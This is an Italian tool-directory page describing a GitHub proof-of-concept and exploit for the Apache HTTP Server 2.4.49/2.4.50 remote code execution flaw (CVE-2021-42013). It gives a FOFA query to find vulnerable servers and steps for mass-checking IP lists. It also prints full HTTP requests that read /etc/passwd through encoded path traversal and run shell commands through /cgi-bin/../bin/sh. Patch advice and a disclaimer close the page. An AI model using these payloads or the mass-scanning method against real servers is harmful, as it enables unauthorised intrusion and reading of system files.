Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-42013-Apache-RCE-Poc-Exp — Strumento di rilevamento di massa per l'esecuzione remota di codice in Apache (CVE-2021-42013): Apache HTTP Server è un server web open source della Apache Software Foundation. Il server è caratterizzato da velocità, affidabilità e dalla possibilità di essere esteso tramite una semplice API. È stato scoperto che la correzione per CVE-2021-41773 in Apache HTTP Server 2.4.50 è insufficiente. Un utente malintenzionato può utilizzare un attacco di path traversal per mappare gli URL a file al di fuori delle directory configurate da direttive simili ad alias. Se questi file al di fuori delle directory non sono protetti dalla configurazione predefinita "Require all denied", queste richieste potrebbero avere successo. Se per questi percorsi alias sono abilitati anche gli script CGI, ciò potrebbe consentire l'esecuzione remota di codice. Questo problema riguarda solo Apache 2.4.49 e Apache 2.4.50, non le versioni precedenti. | Kitploit
Strumenti/GitHubGitHub/asaotomo/cve-2021-42013-apache-rce-poc-exp
RicognizioneScanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubasaotomo/cve-2021-42013-apache-rce-poc-exp

CVE-2021-42013-Apache-RCE-Poc-Exp

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
102114 anni faNon ancora revisionato

Informazioni

Strumento di rilevamento di massa per l'esecuzione remota di codice in Apache (CVE-2021-42013): Apache HTTP Server è un server web open source della Apache Software Foundation. Il server è caratterizzato da velocità, affidabilità e dalla possibilità di essere esteso tramite una semplice API. È stato scoperto che la correzione per CVE-2021-41773 in Apache HTTP Server 2.4.50 è insufficiente. Un utente malintenzionato può utilizzare un attacco di path traversal per mappare gli URL a file al di fuori delle directory configurate da direttive simili ad alias. Se questi file al di fuori delle directory non sono protetti dalla configurazione predefinita "Require all denied", queste richieste potrebbero avere successo. Se per questi percorsi alias sono abilitati anche gli script CGI, ciò potrebbe consentire l'esecuzione remota di codice. Questo problema riguarda solo Apache 2.4.49 e Apache 2.4.50, non le versioni precedenti.

Condividi

Nome della vulnerabilità

Apache Esecuzione remota di codice (CVE-2021-42013)

Descrizione della vulnerabilità

Apache HTTP Server è un server web open source della Apache Software Foundation. Il server è veloce, affidabile e può essere esteso tramite una semplice API. È stato riscontrato che la correzione per CVE-2021-41773 in Apache HTTP Server 2.4.50 è insufficiente. Un utente malintenzionato può utilizzare un attacco di path traversal per mappare gli URL a file al di fuori della directory configurata da direttive simili ad alias. Se questi file esterni alla directory non sono protetti dalla normale configurazione predefinita "Require all denied", tali richieste possono avere successo. Se inoltre gli script CGI sono abilitati per questi percorsi alias, ciò può consentire l'esecuzione remota di codice. Questo problema riguarda solo Apache 2.4.49 e Apache 2.4.50, non le versioni precedenti.

Versioni interessate

Apache HTTP Server 2.4.49

Apache HTTP Server 2.4.50

Sintassi FOFA

server="Apache/2.4.49" || server="Apache/2.4.50"

Utilizzo

1. Inserire gli indirizzi IP da controllare nel file ip.txt
2. Eseguire python3 check.py
image

POC

GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
image

EXP

GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57

echo Content-Type: text/plain; echo;ls /

img

Suggerimenti per la correzione

Al momento queste vulnerabilità sono state corrette; data la gravità del problema, si consiglia agli utenti interessati di aggiornare immediatamente ad Apache HTTP Server 2.4.51 (rilasciato il 7 ottobre) o versioni successive.

Link per il download:

https://httpd.apache.org/download.cgi#apache24

Avvertenze

Questo strumento è fornito esclusivamente ai tester di sicurezza per l'autocontrollo di sicurezza; qualsiasi conseguenza derivante dall'uso improprio da parte degli utenti non è responsabilità dell'autore. Gli utenti devono rispettare le leggi locali. Questo programma non può essere utilizzato per scopi commerciali ed è destinato solo all'apprendimento e alla comunicazione.

147206848-6090876d-d029-4ffd-a6a8-ee4600071404
Scarica lo strumento